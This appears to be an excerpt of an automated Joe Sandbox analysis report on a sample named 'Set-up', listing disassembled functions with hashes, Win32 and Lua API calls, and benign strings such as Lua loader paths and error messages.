Instruction ID: 5cd002a49a7befb20608fee26be6598d1517137dff89d645817266409a14d61b
Opcode Fuzzy Hash: 8e897fd82ec72377907dd00d318980a70d53f6494a585f5e700c8fee083c478c
Instruction Fuzzy Hash: A331D27184835A9ECB26CF00C8C07EEF7E8AF96304F54582DD88653251FBB4E649CB96

Function 029D8422 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 673162ba6d375d50d9dc9659cfa29583d419bf2c06ac203f0a5ce742a8ca816e
Instruction ID: ec8d2705d896dcfa5eb5e3b7c03b9d6dfe8339d40964ed1a50d2266b2c813bd4
Opcode Fuzzy Hash: 673162ba6d375d50d9dc9659cfa29583d419bf2c06ac203f0a5ce742a8ca816e
Instruction Fuzzy Hash: 3D11E33BB24B3507E760CEB6DCC451B6356FBC621570A4538EA49D7643CA32F402E190

Function 029D1184 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction ID: 96fca8eb34ca682e8d47e8378cb432fe76648deb5046b39c0cf948459ebfea3e
Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction Fuzzy Hash: 40319374E0010ADFCB08CF98C590AAEBBB1FF88314F248599D815AB345D335AA82DF94

Function 029FF712 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 416b71b7ce5d3ad7a447599a47459b95baeddeb9c448290b0741d51279b2ee17
Instruction ID: eeb3229e604dd74b4d6c97d2e87c9ec3b8ed01a24d7795671590bf44df20d011
Opcode Fuzzy Hash: 416b71b7ce5d3ad7a447599a47459b95baeddeb9c448290b0741d51279b2ee17
Instruction Fuzzy Hash: D90184F260030187DBA09F5498C0B2BF2EDAFD4744F18843CDA5857A80EBB5EC19DBA1

Function 029EE412 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 931e92df6a04de479f3c1813266d974a05571062c0c4ca0078d8e6d435bd14da
Instruction ID: 17c182bd754bf9b993558696105ff54265efbb42abb7601677ce9ed65824dd71
Opcode Fuzzy Hash: 931e92df6a04de479f3c1813266d974a05571062c0c4ca0078d8e6d435bd14da
Instruction Fuzzy Hash: C0F0A7B1A0411457DF2789589CC0B37BB9C9F8A224F151415E8CB57142E161A84DC7E6

Function 00BEC430 Relevance: 45.9, APIs: 10, Strings: 16, Instructions: 372
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lua_setmetatable.SET-UP(?,000000FE), ref: 00BEC4E1
lua_rawsetp.SET-UP(?,FFF0B9D8,00C386AC,?,000000FE), ref: 00BEC4F1
luaL_setfuncs.SET-UP(?,00C38790,00000000), ref: 00BEC565

Strings

loaded, xrefs: 00BEC6B0
searchers, xrefs: 00BEC601
_PRELOAD, xrefs: 00BEC6C6
\;?!-, xrefs: 00BEC64B
!\lua\?.lua;!\lua\?\init.lua;!\?.lua;!\?\init.lua;!\..\share\lua\5.3\?.lua;!\..\share\lua\5.3\?\init.lua;.\?.lua;.\?\init.lua, xrefs: 00BEC623
!\?.dll;!\..\lib\lua\5.3\?.dll;!\loadall.dll;.\?.dll, xrefs: 00BEC632
version mismatch: app. needs %f, Lua core provides %f, xrefs: 00BEC78A
preload, xrefs: 00BEC6E0
LUA_CPATH, xrefs: 00BEC637
multiple Lua VMs detected, xrefs: 00BEC773
path, xrefs: 00BEC61C
cpath, xrefs: 00BEC63C
LUA_PATH, xrefs: 00BEC628
_LOADED, xrefs: 00BEC696
config, xrefs: 00BEC679
__gc, xrefs: 00BEC4C1

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_setfuncslua_rawsetplua_setmetatable
String ID: !\?.dll;!\..\lib\lua\5.3\?.dll;!\loadall.dll;.\?.dll$!\lua\?.lua;!\lua\?\init.lua;!\?.lua;!\?\init.lua;!\..\share\lua\5.3\?.lua;!\..\share\lua\5.3\?\init.lua;.\?.lua;.\?\init.lua$LUA_CPATH$LUA_PATH$\;?!-$_LOADED$_PRELOAD$__gc$config$cpath$loaded$multiple Lua VMs detected$path$preload$searchers$version mismatch: app. needs %f, Lua core provides %f
API String ID: 2697978218-2629491146
Opcode ID: 6033ab77129c6ca3817294e6d9bbb4ea2500b53a0bf93c09879dde7422bc9518
Instruction ID: 876311684b3ba8705d3abf28126b49b8015f6c35de8625fd5e2506f60168328a
Opcode Fuzzy Hash: 6033ab77129c6ca3817294e6d9bbb4ea2500b53a0bf93c09879dde7422bc9518
Instruction Fuzzy Hash: 69D18F70600209ABDB10EF19D882E7EB7E2FF84324F14C199F91D5B392DB75E8219B81

Function 00A73B60 Relevance: 43.9, APIs: 14, Strings: 11, Instructions: 121
libraryloaderregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(user32.dll,70576E16), ref: 00A73B9D
CreateCompatibleDC.GDI32(00000000), ref: 00A73BD3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A73BDE
DeleteDC.GDI32(00000000), ref: 00A73BEA
LoadLibraryExW.KERNEL32(shcore.dll,00000000,00000800), ref: 00A73C05
GetProcAddress.KERNEL32(00000000,GetDpiForMonitor), ref: 00A73C1A
LoadCursorW.USER32(00000000,00007F00), ref: 00A73C83
RegisterClassExW.USER32(00000030), ref: 00A73C99
LoadCursorW.USER32(00000000), ref: 00A73CF7
RegisterClassExW.USER32(00000030), ref: 00A73D07
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 00A73D26
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 00A73D33
GetProcAddress.KERNEL32(00000000,AdjustWindowRectExForDpi), ref: 00A73D40
GetProcAddress.KERNEL32(00000000,GetDpiForSystem), ref: 00A73D4D

Strings

ListBoxX, xrefs: 00A73C92
0, xrefs: 00A73C64
GetDpiForWindow, xrefs: 00A73D20
shcore.dll, xrefs: 00A73C00
CallTip, xrefs: 00A73D00
GetDpiForSystem, xrefs: 00A73D42
GetSystemMetricsForDpi, xrefs: 00A73D28
GetDpiForMonitor, xrefs: 00A73C14
user32.dll, xrefs: 00A73B91
AdjustWindowRectExForDpi, xrefs: 00A73D35
0, xrefs: 00A73CD8

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: AddressProc$Load$ClassCursorRegister$CapsCompatibleCreateDeleteDeviceHandleLibraryModule
String ID: 0$0$AdjustWindowRectExForDpi$CallTip$GetDpiForMonitor$GetDpiForSystem$GetDpiForWindow$GetSystemMetricsForDpi$ListBoxX$shcore.dll$user32.dll
API String ID: 3087350144-1889033847
Opcode ID: cb3fc626a2114c339985bbd65662e7d4268a2b7c2b8decee1374c5d18e51f168
Instruction ID: a950a397c25f8bf7a56f0fc13b99c7a40374c8339b482a0d48853d9a316094c5
Opcode Fuzzy Hash: cb3fc626a2114c339985bbd65662e7d4268a2b7c2b8decee1374c5d18e51f168
Instruction Fuzzy Hash: BD5105B1D017189BEB20DFE5DC48B8EBBF8EB08714F11411AE509AB2A0DBF95508CF95

Function 00BDA500 Relevance: 37.1, APIs: 6, Strings: 15, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lua_pushfstring.SET-UP(?,%s,?), ref: 00BDA60A
lua_checkstack.SET-UP(?,0000000A), ref: 00BDA615
lua_getinfo.SET-UP(?,Slnt,?), ref: 00BDA6E2
lua_pushfstring.SET-UP(?,%s:,?), ref: 00BDA6F4
lua_pushfstring.SET-UP(?,%d:,?), ref: 00BDA70A
luaL_error.SET-UP(?,stack overflow), ref: 00BDA83D

Strings

(...tail calls...), xrefs: 00BDA751
stack overflow, xrefs: 00BDA837
light userdata, xrefs: 00BDA966, 00BDA97E
%s expected, got %s, xrefs: 00BDA982
calling '%s' on bad self (%s), xrefs: 00BDA8C9
Slnt, xrefs: 00BDA6DC
..., xrefs: 00BDA69E
stack traceback:, xrefs: 00BDA625
%s, xrefs: 00BDA604
method, xrefs: 00BDA88F
in , xrefs: 00BDA712
bad argument #%d to '%s' (%s), xrefs: 00BDA903
%s:, xrefs: 00BDA6EE
bad argument #%d (%s), xrefs: 00BDA912
%d:, xrefs: 00BDA704

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: lua_pushfstring$L_errorlua_checkstacklua_getinfo
String ID: %s:$(...tail calls...)$...$ in $%d:$%s$%s expected, got %s$Slnt$bad argument #%d (%s)$bad argument #%d to '%s' (%s)$calling '%s' on bad self (%s)$light userdata$method$stack overflow$stack traceback:
API String ID: 581061927-4051906992
Opcode ID: 5187faad012c05c20e5e4ec1c1318dc65aac82050fad695a67566320f9199ccb
Instruction ID: 8aa8d10be19e53c2f9df20ab9585542b887bdb0115f05b144fcd44c0b6ea1b0f
Opcode Fuzzy Hash: 5187faad012c05c20e5e4ec1c1318dc65aac82050fad695a67566320f9199ccb
Instruction Fuzzy Hash: EAB191746006058BDB28DF28D591A6EF7F6EF40304B5485AED846DB782FB34ED05CB82

Function 00BDC030 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 245
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

'__tostring' must return a string, xrefs: 00BDC2F2
__name, xrefs: 00BDC205
true, xrefs: 00BDC1B2
nil, xrefs: 00BDC1CD
false, xrefs: 00BDC1B9, 00BDC1BE
object length is not an integer, xrefs: 00BDC0A0
%s: %p, xrefs: 00BDC28E
__tostring, xrefs: 00BDC0C2

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: %s: %p$'__tostring' must return a string$__name$__tostring$false$nil$object length is not an integer$true
API String ID: 0-553602133
Opcode ID: 2d7661c4b8220c376b42d51bff0ea2d0c1bfd9a405742e10aba30b79586e37be
Instruction ID: 9dfb3bd267be9f6d53ed97740c23268bcdfc8b67d1c16df84ad8158ef9f40533
Opcode Fuzzy Hash: 2d7661c4b8220c376b42d51bff0ea2d0c1bfd9a405742e10aba30b79586e37be
Instruction Fuzzy Hash: 6D7107756006445BDB24AB789C8696AFBD5DB41320F2486FBF82A4B3D7FE30D805C792

Function 00BE7D60 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

luaL_setfuncs.SET-UP(?,00C38528,00000000), ref: 00BE7DDF
luaL_newmetatable.SET-UP(?,FILE*), ref: 00BE7DED
luaL_setfuncs.SET-UP(?,00C38588,00000000), ref: 00BE7E41
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00BE7E55
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 00BE7ECF
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00BE7F49

Part of subcall function 00BE6080: lua_setmetatable.SET-UP(?,000000FE,?,?,00BE7E63), ref: 00BE6116

luaL_error.SET-UP(?,multiple Lua VMs detected), ref: 00BE7F8F
luaL_error.SET-UP(?,version mismatch: app. needs %f, Lua core provides %f), ref: 00BE7FA6

Strings

FILE*, xrefs: 00BE7DE7
version mismatch: app. needs %f, Lua core provides %f, xrefs: 00BE7FA0
_IO_output, xrefs: 00BE7EF8
stdout, xrefs: 00BE7F31
_IO_input, xrefs: 00BE7E79
__index, xrefs: 00BE7E02
stdin, xrefs: 00BE7EB7
stderr, xrefs: 00BE7F57
multiple Lua VMs detected, xrefs: 00BE7F89

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func$L_errorL_setfuncs$L_newmetatablelua_setmetatable
String ID: FILE*$_IO_input$_IO_output$__index$multiple Lua VMs detected$stderr$stdin$stdout$version mismatch: app. needs %f, Lua core provides %f
API String ID: 3216850321-963560941
Opcode ID: d9dc2d6c3aae20cec79c06f29d2c4c182ce8b4cc85dbbbab91c053119efbd77e
Instruction ID: 6f96689d2ac272efe9479664c035bd0901a6e6b2029b39ee25c4aea944c9c122
Opcode Fuzzy Hash: d9dc2d6c3aae20cec79c06f29d2c4c182ce8b4cc85dbbbab91c053119efbd77e
Instruction Fuzzy Hash: FA5181B57402404BC754AF299886A1AB7E1EF84324B14C6BDF85A8F3D7EE70D8098B91

Function 00A6EAC0 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 316
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ImmGetContext.IMM32(?,?,?,?,00000000), ref: 00A6EB24
ImmNotifyIME.IMM32(00000000,00000015,00000001,00000000,?,00000000), ref: 00A6EB3F
SetFocus.USER32(?,?,00000000), ref: 00A6EB4B
GetMessageTime.USER32 ref: 00A6EB63
ImmReleaseContext.IMM32(?,?,?,00000000), ref: 00A6EBAF
GetMessageTime.USER32 ref: 00A6EBC4
SetFocus.USER32(?,?,?,00000000,00000000,?,00000000), ref: 00A6EC0E
GetMessageTime.USER32 ref: 00A6EC9F
TrackMouseEvent.USER32(70576E16), ref: 00A6ED22
GetMessageTime.USER32 ref: 00A6ED39
DefWindowProcW.USER32(?,?,?,00000000,?,00000000,?,00000000), ref: 00A6ED6E
GetWindowRect.USER32(?,?), ref: 00A6ED8C
PtInRect.USER32(?,?,00000000), ref: 00A6EDA1
SendMessageW.USER32(00000000,?,?,00000000), ref: 00A6EDC5

Strings

x, xrefs: 00A6EE3D

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Message$Time$ContextFocusRectWindow$EventMouseNotifyProcReleaseSendTrack
String ID: x
API String ID: 4103674602-2363233923
Opcode ID: 32523cc29494f67d0abb6d4b7e08c4730196601aba0375effcba44c39a65e9e7
Instruction ID: a9dab7adb2e69075faa96fc3f1539a5e0a653aefb71420841a5851f048fc42a3
Opcode Fuzzy Hash: 32523cc29494f67d0abb6d4b7e08c4730196601aba0375effcba44c39a65e9e7
Instruction Fuzzy Hash: 15D11575A01618EFCB04DFA8D948BEDBFB6FF48310F158159E856B72A4CB315960CB60

Function 00BEB290 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 266
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lua_pushfstring.SET-UP(?,%s%s,?,_5_3,?,00000001,00BEBFD0), ref: 00BEB2C6
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(00000000,?,%s%s,?,_5_3,?,00000001,00BEBFD0), ref: 00BEB2CC
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?), ref: 00BEB2DC
luaL_gsub.SET-UP(?,00000000,00C60480,00C60484), ref: 00BEB34D
luaL_gsub.SET-UP(?,00000000,00C6047C,?,?,00000000,00C60480,00C60484), ref: 00BEB35F
GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 00BEB3FD
strrchr.VCRUNTIME140 ref: 00BEB41F
luaL_gsub.SET-UP(?,?,00C604B8,?), ref: 00BEB487
luaL_error.SET-UP(?,unable to get ModuleFileName), ref: 00BEB502

Part of subcall function 00BDAA50: luaL_where.SET-UP(?,00000001,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA5B
Part of subcall function 00BDAA50: lua_pushvfstring.SET-UP(?,00BDA842,?,?,00000001,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA68
Part of subcall function 00BDAA50: lua_concat.SET-UP(?,00000002,?,?,00BDA842,?,stack overflow), ref: 00BDAA73
Part of subcall function 00BDAA50: lua_error.SET-UP(?,?,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA7C
Part of subcall function 00BDAA50: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001,?,?,?,?,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA98

luaL_len.SET-UP(?,00000001,00000000,000000E0,?,?,?,?,unable to get ModuleFileName), ref: 00BEB520
lua_touserdata.SET-UP(?,000000FF,00000000,?,?,unable to get ModuleFileName), ref: 00BEB575
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,unable to get ModuleFileName), ref: 00BEB57E

Strings

_5_3, xrefs: 00BEB2AE
unable to get ModuleFileName, xrefs: 00BEB4FC
%s%s, xrefs: 00BEB2B4
LUA_NOENV, xrefs: 00BEB2EF

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_gsub$getenv$FileFreeL_errorL_lenL_whereLibraryModuleName_errnolua_concatlua_errorlua_pushfstringlua_pushvfstringlua_touserdatastrrchr
String ID: %s%s$LUA_NOENV$_5_3$unable to get ModuleFileName
API String ID: 1848715694-2004867651
Opcode ID: a44cb950e1e6d5fd7e4bbdb9dbfbe8ca2e5c1641a363fce4d0232145304acc3d
Instruction ID: 51c38b8c0585174f9674e0dfb43df8541523b4f2ca1f87b14bc654692ea9080d
Opcode Fuzzy Hash: a44cb950e1e6d5fd7e4bbdb9dbfbe8ca2e5c1641a363fce4d0232145304acc3d
Instruction Fuzzy Hash: 18810970A006445BDB24AF298C82E6BB7E5EF44320F1486F9F51A973D6EB70DC41CB91

Function 00A883F0 Relevance: 27.4, APIs: 18, Instructions: 391COMMON

Download Yara Rule

APIs

?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001), ref: 00A884AA
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 00A884CA
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 00A884E2
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140 ref: 00A88506
?_Getcat@?$ctype@_W@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?), ref: 00A8852A
std::_Facet_Register.LIBCPMT ref: 00A88547
??1_Lockit@std@@QAE@XZ.MSVCP140 ref: 00A88562
?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001), ref: 00A8865A
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 00A8867A
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 00A88692
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140 ref: 00A886B6
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?), ref: 00A886DA
std::_Facet_Register.LIBCPMT ref: 00A886F7
??1_Lockit@std@@QAE@XZ.MSVCP140 ref: 00A88712

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getgloballocale@locale@std@@Init@locale@std@@Locimp@12@Locimp@12@_RegisterV42@@Vfacet@locale@2@std::_$D@std@@Getcat@?$ctype@Getcat@?$ctype@_W@std@@
String ID:
API String ID: 3490715262-0
Opcode ID: 8ff74044df12941e8f6a3b94904c01c6c2d04cad15cb3224f8d05e4b1aaf9cc5
Instruction ID: 1a964e03846e7f9d4679f2e56bdf2345a453b58bac6a078dac55df3f3e618b6d
Opcode Fuzzy Hash: 8ff74044df12941e8f6a3b94904c01c6c2d04cad15cb3224f8d05e4b1aaf9cc5
Instruction Fuzzy Hash: 5DF19D70D00219DFDB14EFA4D944BAEBBB5FF04314F548169E806AB291EF34AE06CB91

Function 00BDAE60 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 348COMMON

Download Yara Rule

APIs

lua_tolstring.SET-UP(?,?,00000000,?,?,?,?,?,?), ref: 00BDAE8E
lua_tolstring.SET-UP(?,?,00000000,?,?,?,?,?,?), ref: 00BDAED4
lua_pushfstring.SET-UP(?,invalid option '%s',00000000,00000004,?,?,?), ref: 00BDAF14
luaL_argerror.SET-UP(?,?,00000000,?,?,00000004,?,?,?), ref: 00BDAF21
lua_checkstack.SET-UP(?,?,?,?,?,?,00000000,?,?,00000004,?,?,?), ref: 00BDAF3B
luaL_error.SET-UP(?,stack overflow (%s),?,?,00000000,?,?,00000004,?,?,?), ref: 00BDAF5A
luaL_error.SET-UP(?,stack overflow,?,00000000,?,?,00000004,?,?,?), ref: 00BDAF65
luaL_argerror.SET-UP(?,?,value expected,?,?,?,?,?,stack overflow,?,00000000,?,?,00000004), ref: 00BDAFD2
lua_tolstring.SET-UP(?,?,?,?,?,?,?,value expected,?,?,?,?,?,stack overflow,?,00000000), ref: 00BDAFED
lua_tolstring.SET-UP(?,?,?,00000000,?,?,00000004,?,?,stack overflow,?,00000000,?,?,00000004), ref: 00BDB036

Strings

value expected, xrefs: 00BDAFC7
stack overflow, xrefs: 00BDAF5F
invalid option '%s', xrefs: 00BDAF0E
stack overflow (%s), xrefs: 00BDAF54

Memory Dump Source

